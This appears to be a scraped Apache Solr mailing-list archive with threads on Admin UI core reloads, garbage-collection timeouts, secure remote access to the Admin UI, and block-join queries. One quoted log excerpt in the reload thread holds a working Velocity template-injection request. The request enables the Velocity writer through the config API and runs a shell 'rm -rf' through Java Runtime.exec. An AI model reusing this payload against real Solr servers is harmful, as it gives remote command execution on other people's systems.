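    grep -c 'v.template=custom' /var/solr/logs/solr.log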



On 4/2/20 12:50 AM, TK Solr wrote:

I'm on Solr 8.3.1 running in non-solrcloud mode.

When I tried to reload an existing core from Admin UI's "Core Admin" by 
clicking Reload, after modifying the core's conf/managed-schema, no error was 
reported. But the newly added field type is not shown in the core's Analyzer 
section.


I selected Logging from the side bar, I saw errors like this for every core, 
not just the core I tried to reload.


null:java.io.IOException: Unable to find resource 'custom.vm'
    at 
org.apache.solr.response.VelocityResponseWriter.getTemplate(VelocityResponseWriter.java:374)
    at 
org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:152)
    at 
org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65)

    at org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:892)
    at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:594)
    at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:419)
    at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:351)
    at 
org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1602)

    at 
org.eclipse.jetty.servlet.ServletHandler.doHandle(ServletHandler.java:540)

I could not find any mention of custom.vm in any files under any core's conf 
directory.


I restarted Solr; the core was loaded without an error and I can see the newly 
added field type.


What could be the cause of these errors that only happen with the Reload 
button?

TK




Re: Admin UI core loading fails

2020-04-02 Thread TK Solr


On 4/2/20 5:39 AM, Erick Erickson wrote:

What do your Solr logs show? My bet is that your mods to the configs somehow 
caused the reload to fail too early in the process to be shown in the UI.


These are the lines in solr.log that I see leading up to the stack trace (the 
core name has been changed to my_core). I don't understand why Velocity is 
involved. Is it used by the Admin UI?


2020-04-02 02:16:33.851 INFO  (qtp429353573-15) [   x:my_core] 
o.a.s.h.SolrConfigHandler Executed config commands successfully and persited to 
File System [{"update-queryresponsewriter":{

    "startup":"lazy",
    "name":"velocity",
    "class":"solr.VelocityResponseWriter",
    "template.base.dir":"",
    "solr.resource.loader.enabled":"true",
    "params.resource.loader.enabled":"true"}}]
2020-04-02 02:16:33.854 INFO  (qtp429353573-15) [   x:my_core] o.a.s.c.S.Request 
[my_core]  webapp=/solr path=/config params={} status=0 QTime=487
2020-04-02 02:16:33.854 INFO  (qtp429353573-15) [   x:my_core] o.a.s.c.SolrCore 
[my_core]  CLOSING SolrCore org.apache.solr.core.SolrCore@7b0eae1f
2020-04-02 02:16:33.855 INFO  (qtp429353573-15) [   x:my_core] 
o.a.s.m.SolrMetricManager Closing metric reporters for 
registry=solr.core.my_core, tag=SolrCore@7b0eae1f
2020-04-02 02:16:33.855 INFO  (qtp429353573-15) [   x:my_core] 
o.a.s.m.r.SolrJmxReporter Closing reporter 
[org.apache.solr.metrics.reporters.SolrJmxReporter@2f090079: rootName = null, 
domain = solr.core.my_core, service url = null, agent id = null] for registry 
solr.core.my_core / com.codahale.metrics.MetricRegistry@4125989a
2020-04-02 02:16:33.858 INFO (searcherExecutor-29-thread-1-processing-x:my_core) 
[   x:my_core] o.a.s.c.SolrCore [my_core] Registered new searcher 
Searcher@45a874aa[my_core] 
main{ExitableDirectoryReader(UninvertingDirectoryReader(Uninverting(_0(8.3.1):C55967:[diagnostics={java.vendor=Ubuntu, 
os=Linux, java.version=11.0.6, 
java.vm.version=11.0.6+10-post-Ubuntu-1ubuntu118.04.1, lucene.version=8.3.1, 
os.arch=amd64, java.runtime.version=11.0.6+10-post-Ubuntu-1ubuntu118.04.1, 
source=flush, os.version=4.15.0-76-generic, 
timestamp=1585790971495}]:[attributes={Lucene50StoredFieldsFormat.mode=BEST_SPEED}])))}
2020-04-02 02:16:34.105 INFO  (qtp429353573-17) [   x:my_core] o.a.s.c.S.Request 
[my_core]  webapp=/solr path=/select 
params={q=1&v.template=custom&v.template.custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec('rm+-rf+/tmp/zzz'))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end&wt=velocity} 
hits=0 status=0 QTime=1
2020-04-02 02:16:34.106 INFO  (qtp429353573-17) [   x:my_core] o.a.s.c.PluginBag 
Going to create a new queryResponseWriter with {type = queryResponseWriter,name 
= velocity,class = solr.VelocityResponseWriter,attributes = {startup=lazy, 
name=velocity, class=solr.VelocityResponseWriter, template.base.dir=, 
solr.resource.loader.enabled=true, params.resource.loader.enabled=true},args = 
{startup=lazy,template.base.dir=,solr.resource.loader.enabled=true,params.resource.loader.enabled=true}}
2020-04-02 02:16:34.276 ERROR (qtp429353573-17) [   x:my_core] o.a.v.loader 
ResourceManager: unable to find resource 'custom.vm' in any resource loader.
2020-04-02 02:16:34.276 ERROR (qtp429353573-17) [   x:my_core] 
o.a.s.s.HttpSolrCall null:java.io.IOException: Unable to find resource 'custom.vm'




Best,
Erick


On Apr 2, 2020, at 02:50, TK Solr  wrote:

I'm on Solr 8.3.1 running in non-solrcloud mode.

When I tried to reload an existing core from Admin UI's "Core Admin" by 
clicking Reload, after modifying the core's conf/managed-schema, no error was reported. 
But the newly added field type is not shown in the core's Analyzer section.

I selected Logging from the side bar, I saw errors like this for every core, 
not just the core I tried to reload.

null:java.io.IOException: Unable to find resource 'custom.vm'
 at 
org.apache.solr.response.VelocityResponseWriter.getTemplate(VelocityResponseWriter.java:374)
 at 
org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:152)
 at 
org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65)
 at 
org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:892)
 at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:594)
 at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:419)
 at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:351)
 at 
org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1602)
 at 
org.eclipse.jetty.servlet.ServletHandler.doHandle(ServletHandle

Admin UI core loading fails

2020-04-02 Thread TK Solr

I'm on Solr 8.3.1 running in non-solrcloud mode.

When I tried to reload an existing core from Admin UI's "Core Admin" by clicking 
Reload, after modifying the core's conf/managed-schema, no error was reported. 
But the newly added field type is not shown in the core's Analyzer section.


I selected Logging from the side bar, I saw errors like this for every core, not 
just the core I tried to reload.


null:java.io.IOException: Unable to find resource 'custom.vm'
    at 
org.apache.solr.response.VelocityResponseWriter.getTemplate(VelocityResponseWriter.java:374)
    at 
org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:152)
    at 
org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65)

    at org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:892)
    at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:594)
    at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:419)
    at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:351)
    at 
org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1602)

    at 
org.eclipse.jetty.servlet.ServletHandler.doHandle(ServletHandler.java:540)

I could not find any mention of custom.vm in any files under any core's conf 
directory.


I restarted Solr; the core was loaded without an error and I can see the newly 
added field type.


What could be the cause of these errors that only happen with the Reload 
button?

TK




Re: Solr admin interface freezes on Chrome

2019-10-02 Thread Solr User
> Works fine on Firefox, and I
> haven't made any changes to our Solr instance (v8.1.1) in a while.

Had a co-worker with a similar issue. He had a pop-up blocker enabled in
Chrome that was preventing some resource call (or something similar). When he
switched to Firefox, everything worked without issue. Any chance something
is showing in the developer tools console?


Solr standalone timeouts after upgrading to SOLR 7

2019-10-02 Thread Solr User
Hello all,

We recently moved to Solr 7 from Solr 6 about 2 weeks ago. Once each week
(including today) we have experienced query timeout issues with corresponding GC
events. There was a spike in CPU up to 66%, which is not something we
previously saw with Solr 6. From the Solr logs it looks like something inside
the JVM has happened; Solr is reporting closed connections from Jetty. Our
data size is relatively small, but we do run 5 cores within the one Jetty
instance. Their index sizes are anywhere between 200 MB and 2 GB.

Our memory consumption is relatively low:

"free":"296.1 MB",

  "total":"569.6 MB",

  "max":"9.6 GB",

  "used":"273.5 MB (%2.8)",



We had a spike in traffic about 5 minutes prior to some longer GC events
(similar situation last week).

Any help would be appreciated. Below is my current system info along with a
GC log snippet and the corresponding SOLR log error.

*System info:*
AMZ2 linux
8 core 32 GB Mem
*Java:* 1.8.0_222-ea 25.222-b03
*Solr: *solr-spec-version":"7.7.2"
*Start options: *
"-Xms512m",
"-Xmx10g",
"-XX:NewRatio=3",
"-XX:SurvivorRatio=4",
"-XX:TargetSurvivorRatio=90",
"-XX:MaxTenuringThreshold=8",
"-XX:+UseConcMarkSweepGC",
"-XX:ConcGCThreads=4",
"-XX:ParallelGCThreads=4",
"-XX:+CMSScavengeBeforeRemark",
"-XX:PretenureSizeThreshold=64m",
"-XX:+UseCMSInitiatingOccupancyOnly",
"-XX:CMSInitiatingOccupancyFraction=50",
"-XX:CMSMaxAbortablePrecleanTime=6000",
"-XX:+CMSParallelRemarkEnabled",
"-XX:+ParallelRefProcEnabled",
"-XX:-OmitStackTraceInFastThrow",
"-verbose:gc",
"-XX:+PrintHeapAtGC",
"-XX:+PrintGCDetails",
"-XX:+PrintGCDateStamps",
"-XX:+PrintGCTimeStamps",
"-XX:+PrintTenuringDistribution",
"-XX:+PrintGCApplicationStoppedTime",
"-XX:+UseGCLogFileRotation",
"-XX:NumberOfGCLogFiles=9",
"-XX:GCLogFileSize=20M",
"-Xss256k",
"-Dsolr.log.muteconsole"

Here is an example of from the GC log:

2019-10-02T16:03:15.888+: 265318.624: [Full GC (Allocation
Failure) 2019-10-02T16:03:15.888+: 265318.624:
[CMS2019-10-02T16:03:16.134+: 26
5318.870: [CMS-concurrent-mark: 1.773/1.783 secs] [Times: user=13.14
sys=0.00, real=1.78 secs]
 (concurrent mode failure): 7864319K->7864319K(7864320K), 9.5890129
secs] 10048895K->8863021K(10048896K), [Metaspace:
53159K->53159K(1097728K)], 9.5892061 secs] [Times: user=10.31
sys=0.00, real=9.59 secs]
Heap after GC invocations=296656 (full 546):
 par new generation   total 2184576K, used 998701K
[0x00054000, 0x0005e000, 0x0005e000)
  eden space 1747712K,  57% used [0x00054000,
0x00057cf4b4f0, 0x0005aaac)
  from space 436864K,   0% used [0x0005aaac,
0x0005aaac, 0x0005c556)
  to   space 436864K,   0% used [0x0005c556,
0x0005c556, 0x0005e000)
 concurrent mark-sweep generation total 7864320K, used 7864319K
[0x0005e000, 0x0007c000, 0x0007c000)
 Metaspace   used 53159K, capacity 54766K, committed 55148K,
reserved 1097728K
  class spaceused 5589K, capacity 5950K, committed 6000K, reserved 1048576K
}
2019-10-02T16:03:25.477+: 265328.214: Total time for which
application threads were stopped: 9.5906157 seconds, Stopping threads
took: 0.0001274 seconds
*With the following from the SOLR log: *

[   x:core] o.a.s.s.HttpSolrCall Unable to write response, client
closed connection or we are shutting down

org.eclipse.jetty.io.EofException: Closed

at org.eclipse.jetty.server.HttpOutput.write(HttpOutput.java:665)
~[jetty-server-9.4.14.v20181114.jar:9.4.14.v20181114]

at 
org.apache.solr.servlet.ServletOutputStreamWrapper.write(ServletOutputStreamWrapper.java:126)
~[solr-core-7.7.2.jar:7.7.2 d4c30fc2856154f2c

1fefc589eb7cd070a415b94 - janhoy - 2019-05-28 23:37:48]

at 
org.apache.solr.response.QueryResponseWriterUtil$1.write(QueryResponseWriterUtil.java:54)
~[solr-core-7.7.2.jar:7.7.2 d4c30fc2856154f2c1fef

c589eb7cd070a415b94 - janhoy - 2019-05-28 23:37:48]

at java.io.OutputStream.write(OutputStream.java:116) ~[?:1.8.0_222-ea]

at sun.nio.cs.StreamEncoder.writeBytes(StreamEncoder.java:221)
~[?:1.8.0_222-ea]

at sun.nio.cs.StreamEncoder.implWrite(StreamEncoder.java:282)
~[?:1.8.0_222-ea]

at sun.nio.cs.StreamEncoder.write(StreamEncoder.java:125)
~[?:1.8.0_222-ea]

at java.io.OutputStreamWriter.write(OutputStreamWriter.jav

Fwd: Solr standalone timeouts after upgrading to SOLR 7

2019-10-02 Thread Solr User
Hello all,

We recently moved to Solr 7 from Solr 6 about 2 weeks ago. Once each week
(including today) we have experienced query timeout issues with corresponding GC
events. There was a spike in CPU up to 66%, which is not something we
previously saw with Solr 6. From the Solr logs it looks like something inside
the JVM has happened; Solr is reporting closed connections from Jetty. Our
data size is relatively small, but we do run 5 cores within the one Jetty
instance. Their index sizes are anywhere between 200 MB and 2 GB.

Our memory consumption is relatively low:

"free":"296.1 MB",

  "total":"569.6 MB",

  "max":"9.6 GB",

  "used":"273.5 MB (%2.8)",



We had a spike in traffic about 5 minutes prior to some longer GC events
(similar situation last week).

Any help would be appreciated. Below is my current system info along with a
GC log snippet and the corresponding SOLR log error.

*System info:*
AMZ2 linux
8 core 32 GB Mem
*Java:* 1.8.0_222-ea 25.222-b03
*Solr: *solr-spec-version":"7.7.2"
*Start options: *
"-Xms512m",
"-Xmx10g",
"-XX:NewRatio=3",
"-XX:SurvivorRatio=4",
"-XX:TargetSurvivorRatio=90",
"-XX:MaxTenuringThreshold=8",
"-XX:+UseConcMarkSweepGC",
"-XX:ConcGCThreads=4",
"-XX:ParallelGCThreads=4",
"-XX:+CMSScavengeBeforeRemark",
"-XX:PretenureSizeThreshold=64m",
"-XX:+UseCMSInitiatingOccupancyOnly",
"-XX:CMSInitiatingOccupancyFraction=50",
"-XX:CMSMaxAbortablePrecleanTime=6000",
"-XX:+CMSParallelRemarkEnabled",
"-XX:+ParallelRefProcEnabled",
"-XX:-OmitStackTraceInFastThrow",
"-verbose:gc",
"-XX:+PrintHeapAtGC",
"-XX:+PrintGCDetails",
"-XX:+PrintGCDateStamps",
"-XX:+PrintGCTimeStamps",
"-XX:+PrintTenuringDistribution",
"-XX:+PrintGCApplicationStoppedTime",
"-XX:+UseGCLogFileRotation",
"-XX:NumberOfGCLogFiles=9",
"-XX:GCLogFileSize=20M",
"-Xss256k",
"-Dsolr.log.muteconsole"

Here is an example of from the GC log:

2019-10-02T16:03:15.888+: 265318.624: [Full GC (Allocation
Failure) 2019-10-02T16:03:15.888+: 265318.624:
[CMS2019-10-02T16:03:16.134+: 26
5318.870: [CMS-concurrent-mark: 1.773/1.783 secs] [Times: user=13.14
sys=0.00, real=1.78 secs]
 (concurrent mode failure): 7864319K->7864319K(7864320K), 9.5890129
secs] 10048895K->8863021K(10048896K), [Metaspace:
53159K->53159K(1097728K)], 9.5892061 secs] [Times: user=10.31
sys=0.00, real=9.59 secs]
Heap after GC invocations=296656 (full 546):
 par new generation   total 2184576K, used 998701K
[0x00054000, 0x0005e000, 0x0005e000)
  eden space 1747712K,  57% used [0x00054000,
0x00057cf4b4f0, 0x0005aaac)
  from space 436864K,   0% used [0x0005aaac,
0x0005aaac, 0x0005c556)
  to   space 436864K,   0% used [0x0005c556,
0x0005c556, 0x0005e000)
 concurrent mark-sweep generation total 7864320K, used 7864319K
[0x0005e000, 0x0007c000, 0x0007c000)
 Metaspace   used 53159K, capacity 54766K, committed 55148K,
reserved 1097728K
  class spaceused 5589K, capacity 5950K, committed 6000K, reserved 1048576K
}
2019-10-02T16:03:25.477+: 265328.214: Total time for which
application threads were stopped: 9.5906157 seconds, Stopping threads
took: 0.0001274 seconds
*With the following from the SOLR log: *

[   x:core] o.a.s.s.HttpSolrCall Unable to write response, client
closed connection or we are shutting down

org.eclipse.jetty.io.EofException: Closed

at org.eclipse.jetty.server.HttpOutput.write(HttpOutput.java:665)
~[jetty-server-9.4.14.v20181114.jar:9.4.14.v20181114]

at 
org.apache.solr.servlet.ServletOutputStreamWrapper.write(ServletOutputStreamWrapper.java:126)
~[solr-core-7.7.2.jar:7.7.2 d4c30fc2856154f2c

1fefc589eb7cd070a415b94 - janhoy - 2019-05-28 23:37:48]

at 
org.apache.solr.response.QueryResponseWriterUtil$1.write(QueryResponseWriterUtil.java:54)
~[solr-core-7.7.2.jar:7.7.2 d4c30fc2856154f2c1fef

c589eb7cd070a415b94 - janhoy - 2019-05-28 23:37:48]

at java.io.OutputStream.write(OutputStream.java:116) ~[?:1.8.0_222-ea]

at sun.nio.cs.StreamEncoder.writeBytes(StreamEncoder.java:221)
~[?:1.8.0_222-ea]

at sun.nio.cs.StreamEncoder.implWrite(StreamEncoder.java:282)
~[?:1.8.0_222-ea]

at sun.nio.cs.StreamEncoder.write(StreamEncoder.java:125)
~[?:1.8.0_222-ea]

at java.io.OutputStreamWriter.write(OutputStreamWriter.jav

How to access the Solr Admin GUI (2)

2019-01-02 Thread solr

First I want to thank you for your comments.
Second I'll add some background information.

Here Solr is part of a complex information management project, which I  
developed for a customer and which includes different source  
databases, containing edited/imported/crawled content.
This project runs on a Debian root server, which is hosted by an ISP  
and maintained by the ISP's support team and - a little bit - by me.

This setting was required by my customer.

Solr searches are created and processed on this server from a PHP  
MySQL stack, and port 8983 is only available internally.
I agree that opening port 8983 to the public is dangerous; I've  
experienced that.
Nevertheless from time to time I need access to the Solr Admin GUI on  
that server.


My ISP's support team is not familiar with Solr, but willing to help.
So I'll forward your comments to them and discuss with them.

Thank you again.
Walter


Shawn Heisey wrote on 01.01.2019 20:00:13:

If you've blocked the Solr port, then you can't access Solr at all,  
including the admin UI.  The UI is accessed through the same port as  
the rest of Solr.


The admin UI is a static set of resources (html, css, javascript,  
images, etc) that gets downloaded and runs within the browser,  
accessing the same API that anything else would.  When you issue a  
query with the admin UI, it is your browser that makes the query,  
not the server.


If you set up a reverse proxy that blocks URL paths for the API  
while allowing URL paths for the admin UI, then the admin UI won't  
work -- because everything the admin UI displays or does is  
accomplished by your browser making calls to the API.


Thanks,
Shawn



Terry Steichen wrote on 01.01.2019 19:39:04:


I think a better approach to tunneling would be:

ssh -p  -L :localhost:8983 use...@myremoteserver.example.com

This requires you to set up a different port () rather than use the
standard 22 port (on your router and on your sshd config).  I've been
running something like this for about a year and have rarely if ever had
it attacked.  Prior to changing the port (to ), however, I was under
constant hacking attacks - they find port 22 too attractive to ignore.

Also, regarding my use of port : if you have the server running on
several local machines (as I do), the use of the  port may help
prevent confusion (as to whether your browser is accessing a local -
defaulted to 8983 - or a remote solr server).

Note: you might find that the ssh connection will drop out after some
inactivity, and need to be restarted occasionally.  Pretty simple to do
- just run the ssh line above again.

Note: I also add authorization controls to the AdminUI (and its functions)



Jörn Franke wrote on 01.01.2019 19:11:18:

You could configure a reverse proxy to provide one or more means of  
authentication.


However, I agree that the purpose why this is done should be clarified.



Kay Wrobel wrote on 01.01.2019 19:02:10:


You can use ssh to tunnel in.

ssh -L8983:localhost:8983 use...@myremoteserver.example.com

This will only require port 22 to be exposed to the public.


Sent from my iPhone



Walter Underwood wrote on 01.01.2019 19:00:31:


Yes, exposing the admin UI on the web is very dangerous. Anyone who finds it
can delete all your collections. That UI is designed for “back  
office” use only.


wunder
Walter Underwood
wun...@wunderwood.org
http://observer.wunderwood.org/  (my blog)



Gus Heck wrote on 01.01.2019 18:43:02:


Why would you want to expose the administration gui on the web? This is a
very hazardous thing to do. Never mind that it normally also runs on 8983,
and all its functionality relies on the ability to interact with the API
endpoints hosted on 8983.

What are you actually trying to solve?



Jörn Franke wrote on 31.12.2018 23:07:49:


Reverse proxy?



"aleksander_goncha...@yahoo.de"   
schrieb am 31.12.2018 23:22:59:



Hi Walter,

I had a similar case. It was solved with a proxy: "simply" put Nginx
in between.


Best regards
Alexander


s...@cid.is wrote on 31.12.2018 22:48:55:


Hi all,

is there a way, or better a solution, to access the Solr Admin GUI from
outside the server (via the public web) while the Solr port 8983 is closed
by a firewall and only available inside the server via localhost?


Thanks in advance
Walter Claassen

Alexandraweg 32
D 64287 Darmstadt
Fon +49-6151-4937961
Fax +49-6151-4937969
c...@cid.is




How to access the Solr Admin GUI

2018-12-31 Thread solr

Hi all,

is there a way, or better a solution, to access the Solr Admin GUI from
outside the server (via the public web) while the Solr port 8983 is closed
by a firewall and only available inside the server via localhost?


Thanks in advance
Walter Claassen

Alexandraweg 32
D 64287 Darmstadt
Fon +49-6151-4937961
Fax +49-6151-4937969
c...@cid.is



Re: How to retrieve nested documents (parents and their children together) ?

2018-07-25 Thread TK Solr

Ah, that's what _root_ is for! I was wondering.

Thank you!


On 7/25/18 2:36 PM, Mikhail Khludnev wrote:

_root_:parent-id
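
As a concrete call (the core name is a placeholder), deleting by _root_
removes the parent block together with all of its children:

    curl -X POST -H 'Content-type: text/xml' \
      'http://localhost:8983/solr/mycore/update?commit=true' \
      -d '<delete><query>_root_:parent-id</query></delete>'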

Thu, 26 Jul 2018, 1:33 TK Solr:


The child doc transformer worked great. Thank you.

In my experiment, posting <delete><id>parent-id</id></delete> to the update
end point only deleted the parent doc. Do I issue a complex join query
from id to _version_ and delete all the docs with the matching _version_?


On 7/24/18 9:27 PM, TK Solr wrote:

Thank you. I'll try the child doc transformer.

On a related question, if I delete a parent document, will its children

be

deleted also? Or do I have to have a parent_id field in each child so

that the

child docs can be deleted?


On 7/22/18 10:05 AM, Mikhail Khludnev wrote:

Hello,
Check [child]


https://lucene.apache.org/solr/guide/7_4/transforming-result-documents.html#child-childdoctransformerfactory

or [subquery].
Although, it's worth to put reference to it somewhere in blockjoin
qparsers.
Documentation patches are welcome.


On Sun, Jul 22, 2018 at 10:25 AM TK Solr  wrote:


https://lucene.apache.org/solr/guide/7_4/other-parsers.html#block-join-parent-query-parser


talks about {!parent which=<allParents>}<query matching child docs>, which
returns parent docs only, and {!child of=<allParents>}<query matching parent
docs>, which returns child docs only.

Is there a way to retrieve the matched documents in the original, nested
form?
Using the sample document, is there a way to get:


<add>
  <doc>
    <field name="id">1</field>
    <field name="title">Solr has block join support</field>
    <field name="content_type">parentDocument</field>
    <doc>
      <field name="id">2</field>
      <field name="comments">SolrCloud supports it too!</field>
    </doc>
  </doc>
</add>


rather than just the parent or the child docs?









Re: How to retrieve nested documents (parents and their children together) ?

2018-07-25 Thread TK Solr

The child doc transformer worked great. Thank you.

In my experiment, posting <delete><id>parent-id</id></delete> to the update 
end point only deleted the parent doc. Do I issue a complex join query from id 
to _version_ and delete all the docs with the matching _version_?



On 7/24/18 9:27 PM, TK Solr wrote:

Thank you. I'll try the child doc transformer.

On a related question, if I delete a parent document, will its children be 
deleted also? Or do I have to have a parent_id field in each child so that the 
child docs can be deleted?



On 7/22/18 10:05 AM, Mikhail Khludnev wrote:

Hello,
Check [child]
https://lucene.apache.org/solr/guide/7_4/transforming-result-documents.html#child-childdoctransformerfactory 


or [subquery].
Although, it's worth to put reference to it somewhere in blockjoin
qparsers.
Documentation patches are welcome.


On Sun, Jul 22, 2018 at 10:25 AM TK Solr  wrote:

https://lucene.apache.org/solr/guide/7_4/other-parsers.html#block-join-parent-query-parser 



talks about {!parent which=<allParents>}<query matching child docs>, which
returns parent docs only, and {!child of=<allParents>}<query matching parent
docs>, which returns child docs only.

Is there a way to retrieve the matched documents in the original, nested
form?
Using the sample document, is there a way to get:


<add>
  <doc>
    <field name="id">1</field>
    <field name="title">Solr has block join support</field>
    <field name="content_type">parentDocument</field>
    <doc>
      <field name="id">2</field>
      <field name="comments">SolrCloud supports it too!</field>
    </doc>
  </doc>
</add>


rather than just the parent or the child docs?









Re: How to retrieve nested documents (parents and their children together) ?

2018-07-24 Thread TK Solr

Thank you. I'll try the child doc transformer.

On a related question, if I delete a parent document, will its children be 
deleted also? Or do I have to have a parent_id field in each child so that the 
child docs can be deleted?



On 7/22/18 10:05 AM, Mikhail Khludnev wrote:

Hello,
Check [child]
https://lucene.apache.org/solr/guide/7_4/transforming-result-documents.html#child-childdoctransformerfactory
or [subquery].
Although, it's worth to put reference to it somewhere in blockjoin
qparsers.
Documentation patches are welcome.


On Sun, Jul 22, 2018 at 10:25 AM TK Solr  wrote:


https://lucene.apache.org/solr/guide/7_4/other-parsers.html#block-join-parent-query-parser

talks about {!parent which=<allParents>}<query matching child docs>, which
returns parent docs only, and {!child of=<allParents>}<query matching parent
docs>, which returns child docs only.

Is there a way to retrieve the matched documents in the original, nested
form?
Using the sample document, is there a way to get:


<add>
  <doc>
    <field name="id">1</field>
    <field name="title">Solr has block join support</field>
    <field name="content_type">parentDocument</field>
    <doc>
      <field name="id">2</field>
      <field name="comments">SolrCloud supports it too!</field>
    </doc>
  </doc>
</add>


rather than just the parent or the child docs?







How to retrieve nested documents (parents and their children together) ?

2018-07-22 Thread TK Solr

https://lucene.apache.org/solr/guide/7_4/other-parsers.html#block-join-parent-query-parser

talks about {!parent which=<allParents>}<query matching child docs>, which
returns parent docs only, and {!child of=<allParents>}<query matching parent
docs>, which returns child docs only.


Is there a way to retrieve the matched documents in the original, nested form? 
Using the sample document, is there a way to get:



<add>
  <doc>
    <field name="id">1</field>
    <field name="title">Solr has block join support</field>
    <field name="content_type">parentDocument</field>
    <doc>
      <field name="id">2</field>
      <field name="comments">SolrCloud supports it too!</field>
    </doc>
  </doc>
</add>


rather than just the parent or the child docs?




Re: Parent-child query; subqueries on child docs of the same set of fields

2018-07-08 Thread TK Solr

Mikhail,

Actually, your suggestion worked! I was making a typo in the field name. Thank 
you very much!


TK

p.s. I have found a mention of _query_ "magic field" in the Solr Reference Guide


On 7/8/18 11:04 AM, TK Solr wrote:

Thank you.

This is more promising because I see the second clause in parsedquery. But it 
is hitting zero documents.


The debug query output looks like this. explain is empty:


rawquerystring":"_query_:{!parent which=\"isParent:true\" v='attrname:genre 
AND attrvalue:drama'} AND _query_:{!parent which=\"isParent:true\" 
v='attrname:country AND attrvalue:USA'}",
"querystring":"_query_:{!parent which=\"isParent:true\" v='attrname:genre 
AND attrvalue:drama'} AND _query_:{!parent which=\"isParent:true\" 
v='attrname:country AND attrvalue:USA'}",
"parsedquery":"+AllParentsAware(ToParentBlockJoinQuery (+(+attrname:genre 
+attrvalue:drama))) +AllParentsAware(ToParentBlockJoinQuery 
(+(+attrname:country +attrvalue:usa)))",
"parsedquery_toString":"+ToParentBlockJoinQuery (+(+attrname:genre 
+attrvalue:drama)) +ToParentBlockJoinQuery (+(+attrname:country 
+attrvalue:usa))",

"explain":{},
"QParser":"LuceneQParser",
"timing":{...}


Could you tell me what _query_ does?


On 7/4/18 10:25 PM, Mikhail Khludnev wrote:

agh... It's my pet peeve.
what about
q= {!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'}
AND {!parent which="isParent:true" v='attrname:country AND attrvalue:USA'}

^leading space
q=_query_:{!parent which="isParent:true" v='attrname:genre AND
attrvalue:drama'} AND _query_:{!parent which="isParent:true"
v='attrname:country
AND attrvalue:USA'}
q=+{!parent which="isParent:true" v='attrname:genre AND
attrvalue:drama'} +{!parent
which="isParent:true" v='attrname:country AND attrvalue:USA'}
Beware of escape encoding; it might require replacing + with %2B.
Post debug=query response here.
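
For what it's worth, curl's --data-urlencode takes care of the '+'-vs-%2B
escaping warned about above (the core name is a placeholder; run it from a
script or with history expansion disabled, since the query contains '!'):

    curl http://localhost:8983/solr/mycore/select \
      --data-urlencode "q=+{!parent which=\"isParent:true\" v='attrname:genre AND attrvalue:drama'} +{!parent which=\"isParent:true\" v='attrname:country AND attrvalue:USA'}" \
      --data-urlencode 'debug=query'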

On Tue, Jul 3, 2018 at 9:25 PM TK Solr  wrote:


Thank you, Mikhail. But this didn't work. The first {!parent which='...'
v='...'} alone works. But the second {!parent ...} clause is completely
ignored.
In fact, if I turn on debugQuery, rawquerystring and querystring have the
second query, but parsedquery and parsedquery_toString only have the first
query. BTW, does the v parameter work in place of the query following
{!parsername} for any parser?


On 7/3/18 12:42 PM, Mikhail Khludnev wrote:

q={!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'}

AND

{!parent which="isParent:true" v='attrname:country AND attrvalue:USA'}








Re: Parent-child query; subqueries on child docs of the same set of fields

2018-07-08 Thread TK Solr

Thank you.

This is more promising because I see the second clause in parsedquery. But it is 
hitting zero documents.


The debug query output looks like this. explain is empty:


rawquerystring":"_query_:{!parent which=\"isParent:true\" v='attrname:genre AND 
attrvalue:drama'} AND _query_:{!parent which=\"isParent:true\" 
v='attrname:country AND attrvalue:USA'}",
"querystring":"_query_:{!parent which=\"isParent:true\" v='attrname:genre 
AND attrvalue:drama'} AND _query_:{!parent which=\"isParent:true\" 
v='attrname:country AND attrvalue:USA'}",
"parsedquery":"+AllParentsAware(ToParentBlockJoinQuery (+(+attrname:genre 
+attrvalue:drama))) +AllParentsAware(ToParentBlockJoinQuery (+(+attrname:country 
+attrvalue:usa)))",
"parsedquery_toString":"+ToParentBlockJoinQuery (+(+attrname:genre 
+attrvalue:drama)) +ToParentBlockJoinQuery (+(+attrname:country +attrvalue:usa))",

"explain":{},
"QParser":"LuceneQParser",
"timing":{...}


Could you tell me what _query_ does?


On 7/4/18 10:25 PM, Mikhail Khludnev wrote:

agh... It's my pet peeve.
what about
q= {!parent which="isParent:true" v='attrname:genre AND attrvalue:drama'}
AND {!parent which="isParent:true" v='attrname:country AND attrvalue:USA'}

^leading space
q=_query_:{!parent which="isParent:true" v='attrname:genre AND
attrvalue:drama'} AND _query_:{!parent which="isParent:true"
v='attrname:country
AND attrvalue:USA'}
q=+{!parent which="isParent:true" v='attrname:genre AND
attrvalue:drama'} +{!parent
which="isParent:true" v='attrname:country AND attrvalue:USA'}
Beware of escape encoding; it might require replacing + with %2B.
Post debug=query response here.

